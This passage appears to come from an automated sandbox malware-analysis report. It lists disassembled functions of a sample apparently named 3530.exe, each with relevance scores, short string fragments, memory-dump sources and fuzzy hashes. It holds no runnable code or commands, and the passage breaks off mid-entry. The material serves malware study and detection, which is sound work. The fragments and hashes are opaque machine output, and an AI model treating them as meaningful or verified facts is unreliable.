Instruction Fuzzy Hash: 95A2EC26A4F68287EA749B14B48437EE3E0FB94744F554936E98DC7BB4DE2CF4808B11

Function 00007FF7A09A4BF0 Relevance: 13.3, Strings: 10, Instructions: 766COMMON

Download Yara Rule

Strings

|r1, xrefs: 00007FF7A09A51FD
N(5, xrefs: 00007FF7A09A531C
Yf F, xrefs: 00007FF7A09A539F
Yf F, xrefs: 00007FF7A09A5185
Yf F, xrefs: 00007FF7A09A4E3A
Yf F, xrefs: 00007FF7A09A4C52
N(5, xrefs: 00007FF7A09A5423
Yf F, xrefs: 00007FF7A09A585A
Yf F, xrefs: 00007FF7A09A4D2E
|r1, xrefs: 00007FF7A09A5775

Memory Dump Source

Source File: 00000008.00000002.2796700871.00007FF7A0991000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF7A0990000, based on PE: true

Associated: 00000008.00000002.2796664942.00007FF7A0990000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.2796767126.00007FF7A0A1D000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.2796814974.00007FF7A0A82000.00000004.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff7a0990000_3530.jbxd

Similarity

API ID:
String ID: N(5$N(5$Yf F$Yf F$Yf F$Yf F$Yf F$Yf F$|r1$|r1
API String ID: 0-2101519453
Opcode ID: f8009be155dd3915636a99641ee24c256478b9ce509bbcfda1072173e71214f3
Instruction ID: 2b79be85baaa3c38b033c89646f4850a88b280ee228af2f272ba29cd491b84ba
Opcode Fuzzy Hash: f8009be155dd3915636a99641ee24c256478b9ce509bbcfda1072173e71214f3
Instruction Fuzzy Hash: D0624D61F0B1079AFB64EA3990C01BDA6E19B94314FA25C36E9CDD77F4CE2CF8524621

Function 00007FF7A09AD7A0 Relevance: 13.0, Strings: 10, Instructions: 480COMMON

Download Yara Rule

Strings

C:\Users\user\AppData\Local\Temp\3530.exe, xrefs: 00007FF7A09AD7A8
=OJ/, xrefs: 00007FF7A09AD84A
xsG5, xrefs: 00007FF7A09ADA8C
=OJ/, xrefs: 00007FF7A09ADBC6
xsG5, xrefs: 00007FF7A09AD956
=OJ/, xrefs: 00007FF7A09ADB46
<OJ/, xrefs: 00007FF7A09AD9C9
`4H, xrefs: 00007FF7A09AE01B
`4H, xrefs: 00007FF7A09ADB66
wsG5, xrefs: 00007FF7A09AD870

Memory Dump Source

Source File: 00000008.00000002.2796700871.00007FF7A0991000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF7A0990000, based on PE: true

Associated: 00000008.00000002.2796664942.00007FF7A0990000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.2796767126.00007FF7A0A1D000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.2796814974.00007FF7A0A82000.00000004.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff7a0990000_3530.jbxd

Similarity

API ID:
String ID: <OJ/$=OJ/$=OJ/$=OJ/$C:\Users\user\AppData\Local\Temp\3530.exe$wsG5$xsG5$xsG5$`4H$`4H
API String ID: 0-2535279118
Opcode ID: 98e02864a0ecfe842e897b2ba808a186c900f3ea0867794542303abde7885019
Instruction ID: ed53eb3ede8182cf06dfb6934644bb4cf51f128d80ffca0d9061471903753246
Opcode Fuzzy Hash: 98e02864a0ecfe842e897b2ba808a186c900f3ea0867794542303abde7885019
Instruction Fuzzy Hash: 2812EB26A0F2834BE6789618548037EE6919B59310FA54936EACFC77F1CE2CFC52CB11

Function 00007FF7A09EF370 Relevance: 12.7, Strings: 9, Instructions: 1495COMMON

Download Yara Rule

Strings

iq*, xrefs: 00007FF7A09EFD16
Miz , xrefs: 00007FF7A09F0F82
iq*, xrefs: 00007FF7A09EF833
Miz , xrefs: 00007FF7A09F0374
Liz , xrefs: 00007FF7A09EFB3E
-)W, xrefs: 00007FF7A09F0254
iq*, xrefs: 00007FF7A09F0723
-)W, xrefs: 00007FF7A09F022E
,)W, xrefs: 00007FF7A09EF8E1

Memory Dump Source

Source File: 00000008.00000002.2796700871.00007FF7A0991000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF7A0990000, based on PE: true

Associated: 00000008.00000002.2796664942.00007FF7A0990000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.2796767126.00007FF7A0A1D000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.2796814974.00007FF7A0A82000.00000004.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff7a0990000_3530.jbxd

Similarity

API ID:
String ID: ,)W$-)W$-)W$Liz $Miz $Miz $iq*$iq*$iq*
API String ID: 0-548768203
Opcode ID: 590b667553db37ad33d46751793886593c5a05ea0047d72605d724c0ba00543e
Instruction ID: 01a9af4edc26c6cb34f03532958473c988c175bd88bfd7043711bf37f9f82e4b
Opcode Fuzzy Hash: 590b667553db37ad33d46751793886593c5a05ea0047d72605d724c0ba00543e
Instruction Fuzzy Hash: D6E2D832A0EBC3C5EA759619A09437FA290E7C4754F611937DA8DC7BF8DE2CE8508B11

Function 00007FF7A0A05D40 Relevance: 11.9, Strings: 9, Instructions: 654COMMON

Download Yara Rule

Strings

_^|, xrefs: 00007FF7A0A05FE1
_^|, xrefs: 00007FF7A0A063CC
7ZX, xrefs: 00007FF7A0A06358
) )~, xrefs: 00007FF7A0A067A5
*TZ%, xrefs: 00007FF7A0A0609D
_^|, xrefs: 00007FF7A0A061A5
) )~, xrefs: 00007FF7A0A063DA
*TZ%, xrefs: 00007FF7A0A05E73
7ZX, xrefs: 00007FF7A0A0612D

Memory Dump Source

Source File: 00000008.00000002.2796700871.00007FF7A0991000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF7A0990000, based on PE: true

Associated: 00000008.00000002.2796664942.00007FF7A0990000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.2796767126.00007FF7A0A1D000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.2796814974.00007FF7A0A82000.00000004.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff7a0990000_3530.jbxd

Similarity

API ID:
String ID: ) )~$) )~$*TZ%$*TZ%$7ZX$7ZX$_^|$_^|$_^|
API String ID: 0-1291360158
Opcode ID: 0c4d4502c6196317015b94aea25025952d428ed83f28c07abe1ef988d46b9726
Instruction ID: 103f2a72807f7d3b57818211b76ad2437adb994fc6e54f9802720488c3b59633
Opcode Fuzzy Hash: 0c4d4502c6196317015b94aea25025952d428ed83f28c07abe1ef988d46b9726
Instruction Fuzzy Hash: C742FA23E0E58787DA789E385458B3EA2A0BF44350F91453AE95F87BE5EE2CF8404B51

Function 00007FF7A0A116C0 Relevance: 10.6, Strings: 8, Instructions: 580COMMON

Download Yara Rule

Strings

2s, xrefs: 00007FF7A0A12168
2s, xrefs: 00007FF7A0A11807
`.K*, xrefs: 00007FF7A0A11BCC
bS, xrefs: 00007FF7A0A11867
_.K*, xrefs: 00007FF7A0A119E4
2s, xrefs: 00007FF7A0A1173F
`.K*, xrefs: 00007FF7A0A11A10
2s, xrefs: 00007FF7A0A1215D

Memory Dump Source

Source File: 00000008.00000002.2796700871.00007FF7A0991000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF7A0990000, based on PE: true

Associated: 00000008.00000002.2796664942.00007FF7A0990000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.2796767126.00007FF7A0A1D000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.2796814974.00007FF7A0A82000.00000004.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff7a0990000_3530.jbxd

Similarity

API ID:
String ID: bS$2s$2s$2s$2s$_.K*$`.K*$`.K*
API String ID: 0-1048334069
Opcode ID: dff51098be40e6222de2caf7d6c0a4fd04d9c58727a1f9a2fbde2c55e4c53bfa
Instruction ID: a050cddb0f46927b00110dc1b0b0af0ad4e765307adfb079dba5c4021ba423b9
Opcode Fuzzy Hash: dff51098be40e6222de2caf7d6c0a4fd04d9c58727a1f9a2fbde2c55e4c53bfa
Instruction Fuzzy Hash: CD322037A0E64386EAB467159040A7EE291EB45794FA10D32E99EC7BF4EF3CF4448B11

Function 00007FF7A0A13F20 Relevance: 10.5, Strings: 8, Instructions: 480COMMON

Download Yara Rule

Strings

S; 9, xrefs: 00007FF7A0A1428B
-wJ[, xrefs: 00007FF7A0A142EC
Qz%a, xrefs: 00007FF7A0A14304
,wJ[, xrefs: 00007FF7A0A14058
-wJ[, xrefs: 00007FF7A0A14269
|O, xrefs: 00007FF7A0A144DF
Qz%a, xrefs: 00007FF7A0A14692
S; 9, xrefs: 00007FF7A0A146BA

Memory Dump Source

Source File: 00000008.00000002.2796700871.00007FF7A0991000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF7A0990000, based on PE: true

Associated: 00000008.00000002.2796664942.00007FF7A0990000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.2796767126.00007FF7A0A1D000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.2796814974.00007FF7A0A82000.00000004.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff7a0990000_3530.jbxd

Similarity

API ID:
String ID: ,wJ[$-wJ[$-wJ[$Qz%a$Qz%a$S; 9$S; 9$|O
API String ID: 0-1154477612
Opcode ID: fe857138256265a509485d277373485d5227e5001fa8a0a2808a081bcbb9ba69
Instruction ID: dba29db23debfec4e326292d3edacfc2512fe99ec1402259c4e3bb516cfc735f
Opcode Fuzzy Hash: fe857138256265a509485d277373485d5227e5001fa8a0a2808a081bcbb9ba69
Instruction Fuzzy Hash: 4A020863D0E14387EA305D18924453EFAA297C0364FAB5931EA591B7BCEB3CFC464A91

Function 00007FF7A099BC00 Relevance: 10.5, Strings: 8, Instructions: 464COMMON

Download Yara Rule

Strings

,n, xrefs: 00007FF7A099C004
1NP, xrefs: 00007FF7A099C1D5
1NP, xrefs: 00007FF7A099C0DF
l*y, xrefs: 00007FF7A099C00F
1NP, xrefs: 00007FF7A099C277
l*y, xrefs: 00007FF7A099BF29
1NP, xrefs: 00007FF7A099BC53
,n, xrefs: 00007FF7A099BCBE

Memory Dump Source

Source File: 00000008.00000002.2796700871.00007FF7A0991000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF7A0990000, based on PE: true

Associated: 00000008.00000002.2796664942.00007FF7A0990000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.2796767126.00007FF7A0A1D000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.2796814974.00007FF7A0A82000.00000004.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff7a0990000_3530.jbxd

Similarity

API ID:
String ID: ,n$,n$l*y$l*y$1NP$1NP$1NP$1NP
API String ID: 0-1722865417
Opcode ID: db6509c72773b2e61c1f25060d31486532863ac72bae4357264d848426d9d707
Instruction ID: 3f56aed5cfd5b2d4fc08747b3ad3016f7f67473a0e21acabc104f3ae2eaf26b6
Opcode Fuzzy Hash: db6509c72773b2e61c1f25060d31486532863ac72bae4357264d848426d9d707
Instruction Fuzzy Hash: A9120822F0A647CAEF24AF69858017C66A8AB14BD4F614D36F94DC77B4DE2CF8818351

Function 00007FF7A0A04E10 Relevance: 9.5, Strings: 7, Instructions: 799COMMON

Download Yara Rule

Strings

:-Y!, xrefs: 00007FF7A0A05CD5
Y@%T, xrefs: 00007FF7A0A05CAC
:-Y!, xrefs: 00007FF7A0A0543C
Y@%T, xrefs: 00007FF7A0A050AD
9-Y!, xrefs: 00007FF7A0A04FA6
HG, xrefs: 00007FF7A0A06EDF
X@%T, xrefs: 00007FF7A0A04EA6

Memory Dump Source

Source File: 00000008.00000002.2796700871.00007FF7A0991000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF7A0990000, based on PE: true

Associated: 00000008.00000002.2796664942.00007FF7A0990000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.2796767126.00007FF7A0A1D000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.2796814974.00007FF7A0A82000.00000004.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff7a0990000_3530.jbxd

Similarity

API ID:
String ID: 9-Y!$:-Y!$:-Y!$HG$X@%T$Y@%T$Y@%T
API String ID: 0-1780662477
Opcode ID: d2613bed107605d1fb09313b4cf4704ddb6acf3d551b46a388c776f1c48611c4
Instruction ID: b96a87307674e685b4111b05c2473423802fda8c4622acefab2fac186d2b69b1
Opcode Fuzzy Hash: d2613bed107605d1fb09313b4cf4704ddb6acf3d551b46a388c776f1c48611c4
Instruction Fuzzy Hash: A172FA63A0E64786EA345A35E080A7EE7A1FB44790F914D36E95EC77F4DE2CF8404B11

Function 00007FF7A09D9550 Relevance: 9.4, Strings: 7, Instructions: 652COMMON

Download Yara Rule

Strings

A)an, xrefs: 00007FF7A09D97D2
h @m, xrefs: 00007FF7A09D97EC
B)an, xrefs: 00007FF7A09D9EA3
R>t0, xrefs: 00007FF7A09D9972
h @m, xrefs: 00007FF7A09D9CBE
B)an, xrefs: 00007FF7A09D9C3F
R>t0, xrefs: 00007FF7A09D9C0F

Memory Dump Source

Source File: 00000008.00000002.2796700871.00007FF7A0991000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF7A0990000, based on PE: true

Associated: 00000008.00000002.2796664942.00007FF7A0990000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.2796767126.00007FF7A0A1D000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.2796814974.00007FF7A0A82000.00000004.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff7a0990000_3530.jbxd

Similarity

API ID:
String ID: A)an$B)an$B)an$R>t0$R>t0$h @m$h @m
API String ID: 0-2014293124
Opcode ID: a952c9efa5565efe295c4d81218c6562816acb387cb051f672b544dc10768fb4
Instruction ID: cfb49c08483220fbf0e74701606ffbb78626a79048d52619c8b082c2f7203896
Opcode Fuzzy Hash: a952c9efa5565efe295c4d81218c6562816acb387cb051f672b544dc10768fb4
Instruction Fuzzy Hash: 58521D2284F15347F621BE25A00833AEE50B758744F568932EE5B337B8EA7DF841CB91

Function 00007FF7A09A5ED0 Relevance: 8.1, Strings: 6, Instructions: 617COMMON

Download Yara Rule

Strings

m~MK, xrefs: 00007FF7A09A643E
m~MK, xrefs: 00007FF7A09A6224
Tv, xrefs: 00007FF7A09A6283
9fO, xrefs: 00007FF7A09A69C9
Tv, xrefs: 00007FF7A09A634C
Tv, xrefs: 00007FF7A09A6306

Memory Dump Source

Source File: 00000008.00000002.2796700871.00007FF7A0991000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF7A0990000, based on PE: true

Associated: 00000008.00000002.2796664942.00007FF7A0990000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.2796767126.00007FF7A0A1D000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.2796814974.00007FF7A0A82000.00000004.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff7a0990000_3530.jbxd

Similarity

API ID:
String ID: 9fO$m~MK$m~MK$Tv$Tv$Tv
API String ID: 0-219908125
Opcode ID: 00c47b21b9d8a3baaef8510b81e142f883ad99dbf64240025ea6ed929df38376
Instruction ID: ddc26e2dc067d82d146a3f7d24ede4f4566475d5ecdb1ac4d29e1926a59e48ca
Opcode Fuzzy Hash: 00c47b21b9d8a3baaef8510b81e142f883ad99dbf64240025ea6ed929df38376
Instruction Fuzzy Hash: A042FA62E1E1434BFA786624509463DE6D1AF91304FE60D36E6DB87BF4CD2CF8528B21

Function 00007FF7A09B4E00 Relevance: 8.1, Strings: 6, Instructions: 566COMMON

Download Yara Rule

Strings

9W1_, xrefs: 00007FF7A09B56FB
/qsZ, xrefs: 00007FF7A09B4F7D
9W1_, xrefs: 00007FF7A09B5722
.qsZ, xrefs: 00007FF7A09B4E7D
9W1_, xrefs: 00007FF7A09B5150
/qsZ, xrefs: 00007FF7A09B52EA

Memory Dump Source

Source File: 00000008.00000002.2796700871.00007FF7A0991000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF7A0990000, based on PE: true

Associated: 00000008.00000002.2796664942.00007FF7A0990000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.2796767126.00007FF7A0A1D000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.2796814974.00007FF7A0A82000.00000004.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff7a0990000_3530.jbxd

Similarity

API ID:
String ID: .qsZ$/qsZ$/qsZ$9W1_$9W1_$9W1_
API String ID: 0-2543634031
Opcode ID: 89402d96b922411b10ae2d4b834ca260871eabe2cfc4e2231c842ed1cf945998
Instruction ID: 7554a7c3562d47caab45d4012a1eb975f6541132899075de737e1bafee188d02
Opcode Fuzzy Hash: 89402d96b922411b10ae2d4b834ca260871eabe2cfc4e2231c842ed1cf945998
Instruction Fuzzy Hash: 2022383783C6568AE222DE16604022BF691B795BB2F475621FEA7177E4CB7CFC018B50

Function 00007FF7A0A0F5B0 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 202COMMON

Download Yara Rule

Strings

X,n, xrefs: 00007FF7A0A0F6A0
Y,n, xrefs: 00007FF7A0A0F7CA
Y,n, xrefs: 00007FF7A0A0F7A0

Memory Dump Source

Source File: 00000008.00000002.2796700871.00007FF7A0991000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF7A0990000, based on PE: true

Associated: 00000008.00000002.2796664942.00007FF7A0990000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.2796767126.00007FF7A0A1D000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.2796814974.00007FF7A0A82000.00000004.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff7a0990000_3530.jbxd

Similarity

API ID:
String ID: X,n$Y,n$Y,n
API String ID: 0-3478138459
Opcode ID: 7393856a027c7c6f6f46535301fb7d281f3932de209073a71f34fae8c4450ff3
Instruction ID: 1f85bbccbd076f8292d128129914b0c4d56221d9ad47c7d40ae2e39193fa862e
Opcode Fuzzy Hash: 7393856a027c7c6f6f46535301fb7d281f3932de209073a71f34fae8c4450ff3
Instruction Fuzzy Hash: A6919622F15B4A89FB119F79D8416EC67B0BB48B98F544A21DE4CB3B74EF38E5918310

Function 00007FF7A0A0DFD0 Relevance: 7.2, Strings: 5, Instructions: 941COMMON

Download Yara Rule

Strings

jjs', xrefs: 00007FF7A0A0E868
ijs', xrefs: 00007FF7A0A0E14B
jjs', xrefs: 00007FF7A0A0E544
, xrefs: 00007FF7A0A0ED47
h, xrefs: 00007FF7A0A0E049

Memory Dump Source

Source File: 00000008.00000002.2796700871.00007FF7A0991000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF7A0990000, based on PE: true

Associated: 00000008.00000002.2796664942.00007FF7A0990000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.2796767126.00007FF7A0A1D000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.2796814974.00007FF7A0A82000.00000004.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff7a0990000_3530.jbxd

Similarity

API ID:
String ID: $h$ijs'$jjs'$jjs'
API String ID: 0-1211271916
Opcode ID: 0833125dcb91bdd4cf693f336b6095aefd514b8c7e616e284175bf29d955a52d
Instruction ID: 9a753535518a759b8cc1e9c332d28f5f417b8fdfea801586ab6337f18c5e028f
Opcode Fuzzy Hash: 0833125dcb91bdd4cf693f336b6095aefd514b8c7e616e284175bf29d955a52d
Instruction Fuzzy Hash: 3592D73760E68B86EA74DE24B0A07BEE391FB94350F614932D68DC37B4EE6DE4409711

Function 00007FF7A09D3150 Relevance: 7.2, Strings: 5, Instructions: 940COMMON

Download Yara Rule

Strings

vc[, xrefs: 00007FF7A09D38F2
uc[, xrefs: 00007FF7A09D3386
vc[, xrefs: 00007FF7A09D3816
5n!, xrefs: 00007FF7A09D33A7
5n!, xrefs: 00007FF7A09D31C7

Memory Dump Source

Source File: 00000008.00000002.2796700871.00007FF7A0991000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF7A0990000, based on PE: true

Associated: 00000008.00000002.2796664942.00007FF7A0990000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.2796767126.00007FF7A0A1D000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.2796814974.00007FF7A0A82000.00000004.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff7a0990000_3530.jbxd

Similarity

API ID:
String ID: 5n!$5n!$uc[$vc[$vc[
API String ID: 0-468549941
Opcode ID: d689dfdf6a0b0cb9c1b3688676b1d608ce7ada2b7317cd4df454248670db6ae6
Instruction ID: 0f245eebcca10488697adf360d030a4206d7c7f2c9821e0ffea93ac0a5af9ff0
Opcode Fuzzy Hash: d689dfdf6a0b0cb9c1b3688676b1d608ce7ada2b7317cd4df454248670db6ae6
Instruction Fuzzy Hash: EC823C36E4F68386EA749718E08467EE394EB54751FA1C836D65EC3BB4CE2CF4808B11

Function 00007FF7A09E11F0 Relevance: 7.0, Strings: 5, Instructions: 718COMMON

Download Yara Rule

Strings

U1Of, xrefs: 00007FF7A09E1686
n5, xrefs: 00007FF7A09E15D7
U1Of, xrefs: 00007FF7A09E17B0
U1Of, xrefs: 00007FF7A09E17F1
T1Of, xrefs: 00007FF7A09E139C

Memory Dump Source

Source File: 00000008.00000002.2796700871.00007FF7A0991000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF7A0990000, based on PE: true

Associated: 00000008.00000002.2796664942.00007FF7A0990000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.2796767126.00007FF7A0A1D000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.2796814974.00007FF7A0A82000.00000004.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff7a0990000_3530.jbxd

Similarity

API ID:
String ID: T1Of$U1Of$U1Of$U1Of$n5
API String ID: 0-4219401299
Opcode ID: 156d973a6913e7ebed99fc9eb6a973d56276dfb1d76b04b459c2c9c134cb810a
Instruction ID: 6c008f95ac2c9a3b9df7caa2efa038a41d130992c2ce8a7b52c3042c623bcee7
Opcode Fuzzy Hash: 156d973a6913e7ebed99fc9eb6a973d56276dfb1d76b04b459c2c9c134cb810a
Instruction Fuzzy Hash: 96623937A1E393D2E7705A51648067EE690EB55780F920833DF9D1BBA5CB2EFC408B61

Function 00007FF7A0995AD4 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 267COMMON

Download Yara Rule

Strings

]t{, xrefs: 00007FF7A099608B
]t{, xrefs: 00007FF7A09960AD

Memory Dump Source

Source File: 00000008.00000002.2796700871.00007FF7A0991000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF7A0990000, based on PE: true

Associated: 00000008.00000002.2796664942.00007FF7A0990000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.2796767126.00007FF7A0A1D000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.2796814974.00007FF7A0A82000.00000004.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff7a0990000_3530.jbxd

Similarity

API ID:
String ID: ]t{$]t{
API String ID: 0-2389501032
Opcode ID: 164210f4765284c270436e7d01fdda11d64ce39c3a00b73971ac0ff793d94f89
Instruction ID: 80137da5621f1de81a8c2374216ac0676c2e77b7b54a463dd0e5b321196b3668
Opcode Fuzzy Hash: 164210f4765284c270436e7d01fdda11d64ce39c3a00b73971ac0ff793d94f89
Instruction Fuzzy Hash: 2BB1BF21D0F14386FA7C222450E423ED5996F90380EE60A3AF95F46FF6CD9DB844473A

Function 00007FF7A0A16B70 Relevance: 5.5, Strings: 4, Instructions: 512COMMON

Download Yara Rule

Strings

wnZ:, xrefs: 00007FF7A0A16F50
wnZ:, xrefs: 00007FF7A0A1708A
wtx^, xrefs: 00007FF7A0A16C16
wtx^, xrefs: 00007FF7A0A16EF1

Memory Dump Source

Source File: 00000008.00000002.2796700871.00007FF7A0991000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF7A0990000, based on PE: true

Associated: 00000008.00000002.2796664942.00007FF7A0990000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.2796767126.00007FF7A0A1D000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.2796814974.00007FF7A0A82000.00000004.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff7a0990000_3530.jbxd

Similarity

API ID:
String ID: wnZ:$wnZ:$wtx^$wtx^
API String ID: 0-3875597248
Opcode ID: d42e7927fa4a0fe237480d81f572ed3daddb1ee9c9cde7802877bc667d80464b
Instruction ID: aa9fcd528913cd74fb082b1aca2683417ce576cbed137ec494ae659a55d21e94
Opcode Fuzzy Hash: d42e7927fa4a0fe237480d81f572ed3daddb1ee9c9cde7802877bc667d80464b
Instruction Fuzzy Hash: B2223B6390DD8785EA349A15A040E3FEE54BB507DCF919931DA8E8F7B8EA7CF4408711

Function 00007FF7A09F898B Relevance: 4.4, Strings: 3, Instructions: 688COMMON

Download Yara Rule

Strings

W}:!, xrefs: 00007FF7A09FB520
*FN, xrefs: 00007FF7A09F9351
[[\, xrefs: 00007FF7A09F8CF8

Memory Dump Source

Source File: 00000008.00000002.2796700871.00007FF7A0991000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF7A0990000, based on PE: true

Associated: 00000008.00000002.2796664942.00007FF7A0990000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.2796767126.00007FF7A0A1D000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.2796814974.00007FF7A0A82000.00000004.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff7a0990000_3530.jbxd

Similarity

API ID:
String ID: *FN$W}:!$[[\
API String ID: 0-977268304
Opcode ID: 118ec3e17abe85086266d520440cbc38ebe286edce6aa2a945ce8fe094973cb1
Instruction ID: 7e4007bab9b44d806f73625e1235e57a9209611857025596680b24832ab5bd8b
Opcode Fuzzy Hash: 118ec3e17abe85086266d520440cbc38ebe286edce6aa2a945ce8fe094973cb1
Instruction Fuzzy Hash: 0D62BA27A09AC38EEF745F3998803FD6390EB54758F514932DA4D8B7A4DF29F6808352

Function 00007FF7A0A149F0 Relevance: 4.3, Strings: 3, Instructions: 532COMMON

Download Yara Rule

Strings

:.i, xrefs: 00007FF7A0A14C60
:.i, xrefs: 00007FF7A0A14C53
:.i, xrefs: 00007FF7A0A153A3

Memory Dump Source

Source File: 00000008.00000002.2796700871.00007FF7A0991000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF7A0990000, based on PE: true

Associated: 00000008.00000002.2796664942.00007FF7A0990000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.2796767126.00007FF7A0A1D000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.2796814974.00007FF7A0A82000.00000004.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff7a0990000_3530.jbxd

Similarity

API ID:
String ID: :.i$:.i$:.i
API String ID: 0-2131094505
Opcode ID: 3b60b99af8d6a4cc2720914cd319dbf41b638c4fd23604b3d10f052ebded4ee4
Instruction ID: f4f0d8017ead9f87dbc6e27f9f489dda64def489227e2806ad6219ad32616a63
Opcode Fuzzy Hash: 3b60b99af8d6a4cc2720914cd319dbf41b638c4fd23604b3d10f052ebded4ee4
Instruction Fuzzy Hash: BA32BD6341DA8685F623DE25E00053BEF6CFB51791F419A22EEDB36774DB7CE4428A20

Function 00007FF7A09ACFF0 Relevance: 4.2, Strings: 3, Instructions: 422COMMON

Download Yara Rule

Strings

@W, xrefs: 00007FF7A09AD672
@W, xrefs: 00007FF7A09AD0E1
@W, xrefs: 00007FF7A09AD0D6

Memory Dump Source

Source File: 00000008.00000002.2796700871.00007FF7A0991000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF7A0990000, based on PE: true

Associated: 00000008.00000002.2796664942.00007FF7A0990000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.2796767126.00007FF7A0A1D000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.2796814974.00007FF7A0A82000.00000004.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff7a0990000_3530.jbxd

Similarity

API ID:
String ID: @W$@W$@W
API String ID: 0-4000198689
